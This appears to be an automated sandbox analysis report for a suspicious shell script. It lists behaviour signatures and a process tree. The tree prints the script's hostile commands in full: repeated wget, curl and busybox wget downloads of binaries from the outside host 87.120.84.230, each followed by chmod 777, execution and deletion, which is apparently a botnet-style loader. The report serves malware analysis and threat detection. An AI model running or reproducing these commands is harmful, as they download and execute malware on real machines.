Analysis Overview
SHA256
d187237b4c4e1c3c039503b492ce9cd86024d0ea569c3b0811992396e90df5c3
Threat Level: Shows suspicious behavior
The file dbb43f362c91c1a79b8656e0ca23f39b.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-29 01:46
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-29 01:46
Reported
2024-10-29 01:48
Platform
debian9-mipsel-20240611-en
Max time kernel
69s
Max time network
71s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | N/A |
| N/A | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | N/A |
| N/A | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | N/A |
| N/A | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | N/A |
| N/A | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | N/A |
| N/A | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | N/A |
| N/A | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | N/A |
| N/A | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | N/A |
| N/A | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | N/A |
| N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | N/A |
| N/A | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | N/A |
| N/A | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | N/A |
| N/A | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | N/A |
| N/A | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | N/A |
| N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | N/A |
| N/A | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | N/A |
| N/A | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | N/A |
| N/A | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | N/A |
| N/A | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | N/A |
| N/A | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | N/A |
| N/A | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | N/A |
| N/A | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | N/A |
| N/A | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | N/A |
| N/A | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | N/A |
| N/A | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | N/A |
| N/A | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /usr/bin/curl | N/A |
Processes
/tmp/a5d00471e4903988f4d09563ee3cad4dba92df4fbd6cae9d1b2ffb9ac8538747.sh
[/tmp/a5d00471e4903988f4d09563ee3cad4dba92df4fbd6cae9d1b2ffb9ac8538747.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/chmod
[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/rm
[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/wget
[wget http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/chmod
[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/rm
[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/wget
[wget http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/chmod
[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/rm
[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/wget
[wget http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/chmod
[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/rm
[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/wget
[wget http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/chmod
[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/rm
[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/wget
[wget http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/chmod
[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/rm
[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/wget
[wget http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/chmod
[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/rm
[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/wget
[wget http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/chmod
[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo
[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/rm
[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/wget
[wget http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/chmod
[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K
[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/rm
[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/wget
[wget http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/chmod
[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f
[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/rm
[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/wget
[wget http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/chmod
[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU
[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/rm
[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/wget
[wget http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/chmod
[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD
[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/rm
[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/wget
[wget http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/chmod
[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF
[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/rm
[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/wget
[wget http://87.120.84.230/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/chmod
[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0
[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/rm
[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/wget
[wget http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/chmod
[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K
[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/rm
[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/wget
[wget http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/chmod
[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f
[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/rm
[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/wget
[wget http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/chmod
[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU
[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/rm
[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/wget
[wget http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/chmod
[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo
[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/rm
[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/wget
[wget http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/chmod
[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF
[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/rm
[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/wget
[wget http://87.120.84.230/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/chmod
[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0
[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/rm
[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/wget
[wget http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/chmod
[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD
[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/rm
[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/wget
[wget http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/chmod
[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/rm
[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/wget
[wget http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/chmod
[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
